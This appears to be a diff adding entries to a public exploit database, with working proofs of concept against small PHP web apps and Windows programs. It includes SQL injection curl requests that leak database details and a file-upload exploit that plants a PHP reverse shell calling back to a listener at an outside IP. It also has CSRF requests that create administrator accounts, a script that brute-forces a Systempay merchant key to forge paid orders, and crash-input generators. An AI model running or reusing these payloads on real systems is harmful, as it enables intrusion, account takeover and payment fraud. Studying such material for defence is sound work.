+    --data-binary $'user_email=1\'%20aND%20(SeLeCT%201%20FRoM(SeLeCT%20CoUNT(*),CoNCaT((SeLeCT%20(eLT(2=2,1))),CoNCaT_WS(0x203a20,USeR(),DaTaBaSe(),veRSIoN()),FLooR(RaND(0)*2))x%20FRoM%20INFoRMaTIoN_SCHeMa.PLUGINS%20GRoUP%20BY%20x)a)--%20VerAyari&user_pass=0x5665724179617269&btnLogin=0x5665724179617269' \
+    $'http://localhost/[PATH]/admin/login.php'
+# 
+HTTP/1.1 200 OK
+Date: Wed, 05 Feb 2020 19:18:45 GMT
+Server: Apache/2.4.38 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3
+X-Powered-By: PHP/5.6.40
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Content-Length: 3251
+Connection: close
+Content-Type: text/html; charset=UTF-8
+.............
+<!-- /.login-box -->
+Failed to get query handle: SQLSTATE[23000]: Integrity constraint violation: 1062 Duplicate entry '1root@localhost : exploitdb : 10.1.38-MariaDB1' for key 'group_key'
+# 
+
+# POC: 
+# 2)
+# 
+curl -i -s -k -X $'POST' \
+    -H $'Host: localhost' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 237' -H $'Cookie: PHPSESSID=8aftj770keh6dlgj5sd4a1t5i4' -H $'DNT: 1' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \
+    -b $'PHPSESSID=8aftj770keh6dlgj5sd4a1t5i4' \
+    --data-binary $'USERNAME=1\'%20aND%20(SeLeCT%201%20FRoM(SeLeCT%20CoUNT(*),CoNCaT((SeLeCT%20(eLT(2=2,1))),CoNCaT_WS(0x203a20,USeR(),DaTaBaSe(),veRSIoN()),FLooR(RaND(0)*2))x%20FRoM%20INFoRMaTIoN_SCHeMa.PLUGINS%20GRoUP%20BY%20x)a)--%20verayari&PASS=VerAyari' \
+    $'http://localhost/[PATH]/process.php?action=login'
+# 
+HTTP/1.1 200 OK
+Date: Wed, 05 Feb 2020 19:17:19 GMT
+Server: Apache/2.4.38 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3
+X-Powered-By: PHP/5.6.40
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Content-Length: 167
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+Failed to get query handle: SQLSTATE[23000]: Integrity constraint violation: 1062 Duplicate entry '1root@localhost : exploitdb : 10.1.38-MariaDB1' for key 'group_key'
+#

exploits/php/webapps/48012.txt

@@ -0,0 +1,33 @@
+# Exploit Title: Online Job Portal 1.0 - Remote Code Execution
+# Dork: N/A
+# Date: 2020-02-06
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: https://www.sourcecodester.com/php/13850/online-job-portal-phppdo.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/jobportal.zip
+# Version: 1.0
+# Tested on: Linux
+# CVE: N/A
+
+# POC: 
+# 1)
+# 
+curl -i -s -k -X $'POST' \
+    -H $'Host: localhost' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: multipart/form-data; boundary=---------------------------1852293616672951051689730436' -H $'Content-Length: 781' -H $'Referer: http://localhost/[PATH]/admin/user/index.php?view=view' -H $'Cookie: PHPSESSID=8aftj770keh6dlgj5sd4a1t5i4' -H $'DNT: 1' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \
+    -b $'PHPSESSID=8aftj770keh6dlgj5sd4a1t5i4' \
+    --data-binary $'-----------------------------1852293616672951051689730436\x0d\x0aContent-Disposition: form-data; name=\"mealid\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------1852293616672951051689730436\x0d\x0aContent-Disposition: form-data; name=\"MAX_FILE_SIZE\"\x0d\x0a\x0d\x0a1000000\x0d\x0a-----------------------------1852293616672951051689730436\x0d\x0aContent-Disposition: form-data; name=\"photo\"; filename=\"exp.php\"\x0d\x0aContent-Type: application/x-php\x0d\x0a\x0d\x0aGIF89c;\x0d\x0a<?php $sock = fsockopen(\'192.168.1.104\',6666);\x0d\x0a$descriptorspec = array(\x0d\x0a0 => $sock,\x0d\x0a1 => $sock,\x0d\x0a2 => $sock\x0d\x0a);\x0d\x0a\x0d\x0a$process = proc_open(\'/bin/sh\', $descriptorspec, $pipes);\x0d\x0aproc_close($process);?>\x0d\x0a\x0d\x0a-----------------------------1852293616672951051689730436\x0d\x0aContent-Disposition: form-data; name=\"savephoto\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------1852293616672951051689730436--\x0d\x0a' \
+    $'http://localhost/[PATH]/admin/user/controller.php?action=photos'
+# 
+curl -i -s -k -X $'GET' \
+    -H $'Host: localhost' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3' -H $'Accept-Encoding: gzip, deflate' -H $'Cookie: PHPSESSID=8aftj770keh6dlgj5sd4a1t5i4' -H $'DNT: 1' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \
+    -b $'PHPSESSID=8aftj770keh6dlgj5sd4a1t5i4' \
+    $'http://localhost/[PATH]/admin/user/photos/exp.php'
+# 
+root@ihsan:~/ExploitDB# nc -nlvp 6666
+Ncat: Version 7.80 ( https://nmap.org/ncat )
+Ncat: Listening on :::6666
+Ncat: Listening on 0.0.0.0:6666
+Ncat: Connection from 192.168.1.104.
+Ncat: Connection from 192.168.1.104:35574.
+id
+uid=33(www-data) gid=33(www-data) groups=33(www-data)
+#

exploits/php/webapps/48016.txt

@@ -0,0 +1,49 @@
+# Exploit Title: Online Job Portal 1.0 - Cross Site Request Forgery (Add User)
+# Dork: N/A
+# Date: 2020-02-06
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: https://www.sourcecodester.com/php/13850/online-job-portal-phppdo.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/jobportal.zip
+# Version: 1.0
+# Tested on: Linux
+# CVE: N/A
+
+# POC: 
+# 1)
+# Add User..
+# 
+POST /admin/user/controller.php?action=add HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 106
+Cookie: PHPSESSID=8aftj770keh6dlgj5sd4a1t5i4
+DNT: 1
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+user_id=1&deptid=&U_NAME=hacker&deptid=&U_USERNAME=hacker&deptid=&U_PASS=hacker&U_ROLE=Administrator&save=
+# 
+
+# POC: 
+# 2)
+# Edit User..
+# 
+POST /admin/user/controller.php?action=edit HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 121
+Cookie: PHPSESSID=8aftj770keh6dlgj5sd4a1t5i4
+DNT: 1
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+user_id=1&deptid=&U_NAME=hacker_edit&deptid=&U_USERNAME=hacker_edit&deptid=&U_PASS=hacker_edit&U_ROLE=Administrator&save=
+#

exploits/php/webapps/48017.php

@@ -0,0 +1,98 @@
+# Exploit Title: Ecommerce Systempay 1.0 - Production KEY Brute Force
+# Author: live3
+# Date: 2020-02-05
+# Vendor Homepage: https://paiement.systempay.fr/doc/fr-FR/
+# Software Link: https://paiement.systempay.fr/doc/fr-FR/module-de-paiement-gratuit/
+# Tested on: MacOs
+# Version: ALL
+
+<?php
+/**
+ * 
+ * INFORMATION
+ * Exploit Title:        Ecommerce Systempay decode secret production KEY / Brute Force
+ * Author:               live3
+ * Date:                 2020-02-05
+ * Vendor Homepage:      https://paiement.systempay.fr/doc/fr-FR/
+ * Tested on:            MacOs
+ * Version:              ALL
+ * Prerequisite:         Find a ecommerce who is using Systempay AND SHA1 to crypt signature. 
+ * Put some product on cart and choose systempay for payment method.
+ * get all data from post sent to https://paiement.systempay.fr/vads-payment/
+ * keep signature as reference and all vads fields to create new signature.
+ * Use script to make a brute force on Secret product key (16 char length)
+ *
+ * Usage: Once you have the production KEY all modifications on form data will be accepted by systempay ! (You will just generate new signature with your changes)
+ * You will be able to generate a success payment return !
+ *
+ * FOR EDUCATIONAL PURPOSES ONLY. DO NOT USE THIS SCRIPT FOR ILLEGAL ACTIVITIES.
+ * THE AUTHOR IS NOT RESPONSIBLE FOR ANY MISUSE OR DAMAGE.
+ * 
+ */
+
+// Set the start number you want (16 char length)
+$last_key_check = '1000000000000000';
+
+// Assign var
+$array_key = array();
+$sentence = '';
+$how_many_key_to_check_for_loop = 10;
+
+// Put here signature extract from POST DATA
+// Example of SHA1 from string : test
+$signature_from_post = 'a94a8fe5ccb19ba61c4c0873d391e987982fbbd3';
+
+// Copy paste your content decoded of POST DATA
+$form_data = '
+vads_field_1: VALUE1
+vads_field_2: VALUE2
+// AND ALL OTHER FIELDS...
+';
+
+$array = explode(PHP_EOL, $form_data);
+
+foreach ($array as $data) {
+    if ($data != '') {
+        $elements = explode(': ', $data);
+        if (!empty($elements)) {
+            $array_key[trim($elements[0])] = $elements[1];
+        }
+    }
+}
+
+ksort($array_key);
+
+foreach ($array_key as $value) {
+    $sentence .= $value . '+';
+}
+
+
+echo 'Signature from POST DATA : '.$signature_from_post.'<br/>';
+
+$found = false;
+$get_key = '';
+
+// first check
+if (sha1($sentence.$last_key_check) != $signature_from_post) {
+    for ($i = $last_key_check; $i <= $last_key_check+$how_many_key_to_check_for_loop; $i++) {
+        $get_key = $i;
+        if (sha1($sentence.$i) == $signature_from_post) {
+            echo 'Key found : '.$i.'<br/>';
+            $found = true;
+            break;
+        }
+    }
+} else {
+    $found = true;
+}
+
+
+if ($found) {
+    $test_sha = sha1($sentence.$get_key);
+    echo 'Signature calc : '.$test_sha.'<br/><hr/>';
+} else {
+    echo 'Last key check : '.$get_key.'<br/><hr/>';
+}
+
+
+echo 'Your sequence : '.$sentence.'<br/>';

exploits/windows/dos/48005.py

@@ -0,0 +1,22 @@
+# Exploit Title: AbsoluteTelnet 11.12 - "license name" Denial of Service (PoC)
+# Discovery by: chuyreds
+# Discovery Date: 2020-02-05
+# Vendor Homepage: https://www.celestialsoftware.net/
+# Software Link : https://www.celestialsoftware.net/telnet/AbsoluteTelnet11.12.exe
+# Tested Version: 11.12
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows 10 Pro x64 es
+
+#Steps to produce the crash:
+#1.- Run python code: AbsoluteTelent 11.12_license_code.py
+#2.- Open AbsoluteTelent_license_code.txt and copy content to clipboard
+#3.- Open AbsoluteTelnet.exe
+#4.- Select "Help" > "Enter License Key"
+#5.- In "License code" paste Clipboard
+#6.- Crashed
+
+cod = "\x41" * 2500
+
+f = open('AbsoluteTelent_license_code.txt', 'w')
+f.write(cod)
+f.close()

exploits/windows/dos/48006.py

@@ -0,0 +1,23 @@
+# Exploit Title: AbsoluteTelnet 11.12 - "license name" Denial of Service (PoC)
+# Discovery by: chuyreds
+# Discovery Date: 2020-02-05
+# Vendor Homepage: https://www.celestialsoftware.net/
+# Software Link : https://www.celestialsoftware.net/telnet/AbsoluteTelnet11.12.exe
+# Tested Version: 11.12
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows 10 Pro x64 es
+
+
+#Steps to produce the crash:
+#1.- Run python code: AbsoluteTelent 11.12_license_name.py
+#2.- Open AbsoluteTelent_license_name.txt and copy content to clipboard
+#3.- Open AbsoluteTelnet.exe
+#4.- Select "Help" > "Enter License Key"
+#5.- In "License Name" paste Clipboard
+#6.- Crashed
+
+cod = "\x41" * 2500
+
+f = open('AbsoluteTelent_license_name.txt', 'w')
+f.write(cod)
+f.close()

exploits/windows/dos/48010.py

@@ -0,0 +1,22 @@
+# Exploit Title: AbsoluteTelnet 11.12 - 'SSH2/username' Denial of Service (PoC)
+# Discovery by: chuyreds 
+# Discovery Date: 2020-02-05
+# Vendor Homepage: https://www.celestialsoftware.net/
+# Software Link : https://www.celestialsoftware.net/telnet/AbsoluteTelnet11.12.exe
+# Tested Version: 11.12
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows 10 Pro x64 es
+
+#Steps to produce the crash:
+#1.- Run python code: AbsoluteTelnet 11.12_username_ssh2.py
+#2.- Open absolutetelnet_username_SSH2.txtabsolutetelnet_username.txt and copy content to clipboard
+#3.- Open AbsoluteTelnet
+#4.- Select "new connection file", "Connection", "SSH2", "Use last username"
+#5.- In "username" field paste Clipboard
+#6.- Select "OK"
+#7.- Crashed
+
+buffer = "\x41" * 1000
+f = open ("absolutetelnet_username_SSH2.txt", "w")
+f.write(buffer)
+f.close()

exploits/windows/dos/48011.py

@@ -0,0 +1,24 @@
+# Exploit Title: TapinRadio 2.12.3 - 'address' Denial of Service (PoC)
+# Discovery by: chuyreds
+# Discovery Date: 2020-02-05
+# Vendor Homepage: http://www.raimersoft.com/rarmaradio.html
+# Software Link : http://www.raimersoft.com/downloads/tapinradio_setup_x64.exe
+# Tested Version: 2.12.3
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows 10 Pro x64 es
+
+#Steps to produce the crash:
+#1.- Run python code: tapinadio_address.py
+#2.- Open tapin_add.txt and copy content to clipboard
+#3.- Open TapinRadio
+#4.- Select "Settings" > "Preferences" > "Miscellaneous"
+#5.- Select "Set Application Proxy..."" In "Address" field paste Clipboard
+#6.- In Port type "444" > "Username" type "test" > Password type "1234"
+#7.- Select "OK" and "OK"
+#8.- Crashed
+
+cod = "\x41" * 3000
+	
+f = open('tapin_add.txt', 'w')
+f.write(cod)
+f.close()

exploits/windows/dos/48013.py

@@ -0,0 +1,24 @@
+# Exploit Title: TapinRadio 2.12.3 - 'username' Denial of Service (PoC)
+# Discovery by: chuyreds 
+# Discovery Date: 2020-02-05
+# Vendor Homepage: http://www.raimersoft.com/rarmaradio.html
+# Software Link : http://www.raimersoft.com/downloads/tapinradio_setup_x64.exe
+# Tested Version: 2.12.3
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows 10 Pro x64 es
+
+#Steps to produce the crash:
+#1.- Run python code: tapinadio_user.py
+#2.- Open tapin_user.txt and copy content to clipboard
+#3.- Open TapinRadio
+#4.- Select "Settings" > "Preferences" > "Miscellaneous"
+#5.- Select "Set Application Proxy..."" In "Username" field paste Clipboard
+#6.- In Server type "1.1.1.1" > Port type 444  > Password type "1234"
+#7.- Select "OK" and "OK"
+#8.- Crashed
+
+cod = "\x41" * 10000
+	
+f = open('tapin_user.txt', 'w')
+f.write(cod)
+f.close()

exploits/windows/dos/48014.py

@@ -0,0 +1,21 @@
+# Exploit Title: RarmaRadio 2.72.4 - 'username' Denial of Service (PoC)
+# Discovery by: chuyreds
+# Discovery Date: 2020-02-05
+# Vendor Homepage: http://www.raimersoft.com/rarmaradio.html
+# Software Link : http://www.raimersoft.com/downloads/rarmaradio_setup.exe
+# Tested Version: 2.72.4
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows 10 Pro x64 es
+
+#Steps to produce the crash:
+#1.- Run python code: rarmaradio_username.py
+#2.- Open RarmaRadio2.72.4_username.txt and copy content to clipboard
+#3.- Open RarmaRadio
+#4.- Select "Edit" > "Settings" > "Network"
+#5.- In "Username" field paste Clipboard
+#6.- Select "OK"
+#7.- Crashed
+buffer = "\x41" * 5000
+f = open ("RarmaRadio2.72.4_username.txt", "w")
+f.write(buffer)
+f.close()

exploits/windows/dos/48015.py

@@ -0,0 +1,22 @@
+# Exploit Title: RarmaRadio 2.72.4 - 'server' Denial of Service (PoC)
+# Discovery by: chuyreds 
+# Discovery Date: 05-02-2020
+# Vendor Homepage: http://www.raimersoft.com/rarmaradio.html
+# Software Link : http://www.raimersoft.com/downloads/rarmaradio_setup.exe
+# Tested Version: 2.72.4
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows 10 Pro x64 es
+
+# Steps to produce the crash:
+#1.- Run python code: RarmaRadio2.72.4_server.py
+#2.- Open RarmaRadio2.72.4_server.txt and copy content to clipboard
+#3.- Open RarmaRadio
+#4.- Select "Edit" > "Settings" > "Network"
+#5.- In "Server" field paste Clipboard
+#6.- Select "OK"
+#7.- Crashed
+
+buffer = "\x41" * 4000
+f = open ("RarmaRadio2.72.4_server.txt", "w")
+f.write(buffer)
+f.close()

exploits/windows/local/48009.txt

@@ -0,0 +1,25 @@
+#Exploit Title: ELAN Smart-Pad 11.10.15.1 - 'ETDService' Unquoted Service Path
+#Exploit Author : ZwX
+#Exploit Date: 2020-02-05
+#Vendor : ELAN Microelectronics
+#Vendor Homepage : http://www.emc.com.tw/
+#Tested on OS: Windows 10 v1803
+
+
+#Analyze PoC :
+==============
+
+
+C:\Users\ZwX>sc qc ETDService
+[SC] QueryServiceConfig réussite(s)
+
+SERVICE_NAME: ETDService
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files\Elantech\ETDService.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : Elan Service
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem

files_exploits.csv

@@ -6666,6 +6666,14 @@ id,file,description,date,author,type,platform,port
 47970,exploits/multiple/dos/47970.txt,"macOS/iOS ImageIO - Heap Corruption when Processing Malformed TIFF Image",2020-01-28,"Google Security Research",dos,multiple,
 47987,exploits/linux/dos/47987.cs,"BearFTP 0.1.0 - 'PASV' Denial of Service",2020-02-03,kolya5544,dos,linux,
 47993,exploits/ios/dos/47993.py,"P2PWIFICAM2 for iOS 10.4.1 - 'Camera ID' Denial of Service (PoC)",2020-02-03,"Ivan Marmolejo",dos,ios,
+48005,exploits/windows/dos/48005.py,"AbsoluteTelnet 11.12 - _license name_ Denial of Service (PoC)",2020-02-06,chuyreds,dos,windows,
+48006,exploits/windows/dos/48006.py,"AbsoluteTelnet 11.12 - 'license name' Denial of Service (PoC)",2020-02-06,chuyreds,dos,windows,
+48008,exploits/linux/dos/48008.txt,"VIM 8.2 - Denial of Service (PoC)",2020-02-06,"Dhiraj Mishra",dos,linux,
+48010,exploits/windows/dos/48010.py,"AbsoluteTelnet 11.12 - 'SSH2/username' Denial of Service (PoC)",2020-02-06,chuyreds,dos,windows,
+48011,exploits/windows/dos/48011.py,"TapinRadio 2.12.3 - 'address' Denial of Service (PoC)",2020-02-06,chuyreds,dos,windows,
+48013,exploits/windows/dos/48013.py,"TapinRadio 2.12.3 - 'username' Denial of Service (PoC)",2020-02-06,chuyreds,dos,windows,
+48014,exploits/windows/dos/48014.py,"RarmaRadio 2.72.4 - 'username' Denial of Service (PoC)",2020-02-06,chuyreds,dos,windows,
+48015,exploits/windows/dos/48015.py,"RarmaRadio 2.72.4 - 'server' Denial of Service (PoC)",2020-02-06,chuyreds,dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -10928,6 +10936,7 @@ id,file,description,date,author,type,platform,port
 47995,exploits/linux/local/47995.txt,"Sudo 1.8.25p - Buffer Overflow",2020-02-04,"Joe Vennix",local,linux,
 47999,exploits/linux/local/47999.txt,"Socat 1.7.3.4 - Heap-Based Overflow (PoC)",2020-02-05,hieubl,local,linux,
 48000,exploits/linux/local/48000.sh,"xglance-bin 11.00 - Privilege Escalation",2020-02-05,redtimmysec,local,linux,
+48009,exploits/windows/local/48009.txt,"ELAN Smart-Pad 11.10.15.1 - 'ETDService' Unquoted Service Path",2020-02-06,ZwX,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -42300,3 +42309,10 @@ id,file,description,date,author,type,platform,port
 48001,exploits/java/webapps/48001.py,"Kronos WebTA 4.0 - Authenticated Remote Privilege Escalation",2020-02-05,nxkennedy,webapps,java,
 48002,exploits/json/webapps/48002.py,"Verodin Director Web Console 3.5.4.0 - Remote Authenticated Password Disclosure (PoC)",2020-02-05,nxkennedy,webapps,json,
 48003,exploits/json/webapps/48003.txt,"AVideo Platform 8.1 - Cross Site Request Forgery (Password Reset)",2020-02-05,"Ihsan Sencan",webapps,json,
+48007,exploits/php/webapps/48007.txt,"Online Job Portal 1.0 - 'user_email' SQL Injection",2020-02-06,"Ihsan Sencan",webapps,php,
+48012,exploits/php/webapps/48012.txt,"Online Job Portal 1.0 - Remote Code Execution",2020-02-06,"Ihsan Sencan",webapps,php,
+48016,exploits/php/webapps/48016.txt,"Online Job Portal 1.0 - Cross Site Request Forgery (Add User)",2020-02-06,"Ihsan Sencan",webapps,php,
+48017,exploits/php/webapps/48017.php,"Ecommerce Systempay 1.0 - Production KEY Brute Force",2020-02-06,live3,webapps,php,
+48018,exploits/java/webapps/48018.py,"Cisco Data Center Network Manager 11.2 - Remote Code Execution",2020-02-06,mr_me,webapps,java,
+48019,exploits/java/webapps/48019.py,"Cisco Data Center Network Manager 11.2.1 - 'getVmHostData' SQL Injection",2020-02-06,mr_me,webapps,java,
+48020,exploits/java/webapps/48020.py,"Cisco Data Center Network Manager 11.2.1 - 'LanFabricImpl' Command Injection",2020-02-06,mr_me,webapps,java,